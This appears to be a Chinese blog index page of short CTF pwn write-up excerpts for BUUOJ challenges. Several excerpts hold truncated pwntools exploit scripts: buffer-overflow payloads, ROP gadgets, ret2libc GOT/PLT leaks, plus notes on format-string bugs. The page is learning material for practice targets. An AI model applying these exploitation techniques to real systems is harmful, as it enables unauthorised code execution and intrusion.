上一页 1 2 3 4 5 6 7 ··· 12 下一页
摘要: 点击查看代码 from pwn import * from LibcSearcher import * r=remote("node4.buuoj.cn",26937) pop_rdi=0x0000000000400a93 elf=ELF('./babystack') puts_got=elf.go 阅读全文
posted @ 2022-07-04 17:47 REPWNER 阅读(4) 评论(0) 推荐(0)
摘要: 这题又是和系统调用有关的,叫内联汇编,我不懂 点击查看代码 from pwn import * loacl_elf = ELF("./start") context.arch = loacl_elf.arch #p = process("./start") p = remote("node4.buu 阅读全文
posted @ 2022-07-04 16:49 REPWNER 阅读(2) 评论(0) 推荐(0)
摘要: 这题我看不懂close有什么用,但是我看到了shell里有好东西,我就直接nc打了,但是没有用,看别人的wp我才知道。 close(1)关了标准输出 0,1,2分别为标准输入,标准输出,标准错误, 所以flag输出不出来 学一句 exec 1>&0 这个叫什么重定向,就是重置了标准输出 然后就可以c 阅读全文
posted @ 2022-07-04 16:37 REPWNER 阅读(3) 评论(0) 推荐(0)
摘要: 对我来说是很难的格式化字符串漏洞了。 看题目的时候就觉得不对,溢出不了,完全没有一个溢出的可能 然后就是学习了一波格式化字符串漏洞的小细节。 对于格式化漏洞,我们肯定是要有个输入去判断一下输入的偏移量。 比如这里,输入可以看到有个改变,32位4个字节,为了保持页对齐,所以多来一个字符是合理的。 这样 阅读全文
posted @ 2022-07-04 16:26 REPWNER 阅读(163) 评论(0) 推荐(0)
摘要: 这道题本来以为是普通的shellcode,但是本地和远程竟然不一样,在第一次不会回显地址,而且好像在一次运行里地址也会不一样,那这样就不能用shellcode去打,还是要用ret2libc 点击查看代码 from pwn import * from LibcSearcher import * r = 阅读全文
posted @ 2022-07-04 14:13 REPWNER 阅读(63) 评论(0) 推荐(0)
摘要: 这题记到的东西就是直接调用函数找到call它的地方 找字符串可以用ROPgadget --binary 文件名 --string "sh" 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",29939) io.recvuntil("/_/ /_/ 阅读全文
posted @ 2022-07-03 15:57 REPWNER 阅读(22) 评论(0) 推荐(0)
摘要: 这道题就是纸老虎 保护全开 看主程序 完成check就可以直接system('/bin/sh') check看一下 就是要等于这个玩意就是 可是看回主程序,这里输入的是v4,判断的v5,这里想起来了局部变量在栈上是按顺序排下来的,两个一个距离ebp是0x70一个是0x40减一下就好了 点击查看代码 阅读全文
posted @ 2022-07-03 15:43 REPWNER 阅读(23) 评论(0) 推荐(0)
摘要: 诶,这么简单的题还不能一次ac,易错点在于偏移ida的静态分析是错的 两个减一下 0x14 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",28869) payload='a'*(0x14+0x4)+p32(0x804856D) io.send 阅读全文
posted @ 2022-07-03 01:55 REPWNER 阅读(35) 评论(0) 推荐(0)
摘要: 32位ret2libc 还是注意返回值得接返回地址后面 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",29550) elf=ELF("./bof") write_plt=elf.plt['write'] write_got=elf.got[' 阅读全文
posted @ 2022-07-03 01:36 REPWNER 阅读(4) 评论(0) 推荐(0)
摘要: 记住给一个返回地址 一个溢出点溢出到这个函数,然后给两个参数直接给就好 点击查看代码 from pwn import * io=remote("node4.buuoj.cn",29294) io.recvuntil("Please enter your string: ") payload='a'* 阅读全文
posted @ 2022-07-03 01:15 REPWNER 阅读(19) 评论(0) 推荐(0)
上一页 1 2 3 4 5 6 7 ··· 12 下一页